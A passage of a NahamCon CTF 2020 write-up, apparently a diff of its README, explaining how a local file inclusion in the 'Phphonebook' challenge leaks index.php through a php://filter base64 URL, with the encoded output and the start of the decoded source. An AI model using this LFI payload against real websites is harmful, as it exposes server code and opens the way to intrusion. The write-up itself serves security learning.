W3rni0/NahamCon_CTF_2020/readme.md

 ![](assets//images//phphonebook_1.png)

-so the site tells us that the php source for the page accepts parameters...oooh we might have LFI (local file inclusion), php allows the inclusion of files from the server as parameters in order to extend the functionality of the code or to use code from other files, but if the code is not sanitising the input (filtering out sensitive files) an attacker can include any arbitrary file on the web server as the input or atleast read the php code in the current directory, this code stays in the setver-side and should never be revealed to the client-side as it may contain sensitive data (and there is no use to it in client-side), but if we want to read php files we'll need to encode or encrypt the data as the LFI vulnrable php code will read the file as code and execute it, we can do such things using the php://filter wrapper, we can use this wrapper in the following way to leak the php code for index page index.php:
+so the site tells us that the php source for the page accepts parameters...oooh we might have LFI (local file inclusion), php allows the inclusion of files from the server as parameters in order to extend the functionality of the script or to use code from other files, but if the script is not sanitising the input as needed (filtering out sensitive files) an attacker can include any arbitrary file on the web server or atleast use what's not filtered to his adventage, php scripts stay in the server-side and should not be revealed to the client-side as it may contain sensitive data (and there is no use to it in the client-side), if we want to leak the php files we'll need to encode or encrypt the data as the LFI vulnrable php code will read the file as code and execute it, we can do such things using the php://filter wrapper, using this wrapper in the following way will leak the php source code for index page:

 `http://jh2i.com:50002/index.php?file=php://filter/convert.base64-encode/resource=index.php`

-by going to this url we get the file base64 encoded:
+and by going to this url we get the file base64 encoded:

 ![](assets//images//phphonebook_2.png)

 ```
 PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KICA8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDx0aXRsZT5QaHBob25lYm9vazwvdGl0bGU+CiAgICA8bGluayBocmVmPSJtYWluLmNzcyIgcmVsPSJzdHlsZXNoZWV0Ij4KICA8L2hlYWQ+CiAgPGJvZHk+Cgk8P3BocAoJCSRmaWxlPSRfR0VUWydmaWxlJ107CgkJaWYoIWlzc2V0KCRmaWxlKSkKCQl7CgkJCWVjaG8gIlNvcnJ5ISBZb3UgYXJlIGluIC9pbmRleC5waHAvP2ZpbGU9IjsKCQl9IGVsc2UKCQl7CgkJCWluY2x1ZGUoc3RyX3JlcGxhY2UoJy5waHAnLCcnLCRfR0VUWydmaWxlJ10pLiIucGhwIik7CgkJCWRpZSgpOwoJCX0KCT8+CgkgIAk8cD5UaGUgcGhvbmVib29rIGlzIGxvY2F0ZWQgYXQgPGNvZGU+cGhwaG9uZWJvb2sucGhwPC9jb2RlPjwvcD4KCjxkaXYgc3R5bGU9InBvc2l0aW9uOmZpeGVkOyBib3R0b206MSU7IGxlZnQ6MSU7Ij4KPGJyPjxicj48YnI+PGJyPgo8Yj4gTk9UIENIQUxMRU5HRSBSRUxBVEVEOjwvYj48YnI+VEhBTksgWU9VIHRvIElOVElHUklUSSBmb3Igc3VwcG9ydGluZyBOYWhhbUNvbiBhbmQgTmFoYW1Db24gQ1RGIQo8cD4KPGltZyB3aWR0aD02MDBweCBzcmM9Imh0dHBzOi8vZDI0d3VxNm85NTFpMmcuY2xvdWRmcm9udC5uZXQvaW1nL2V2ZW50cy9pZC80NTcvNDU3NzQ4MTIxL2Fzc2V0cy9mN2RhMGQ3MThlYjc3YzgzZjVjYjYyMjFhMDZhMmY0NS5pbnRpLnBuZyI+CjwvcD4KPC9kaXY+CgogIDwvYm9keT4KIDwvaHRtbD4=
 ```

-and decoding from base64 gives us the code:
+and decoding this from base64 gives us the code:

 ```php
 <!DOCTYPE html>
 <html lang="en">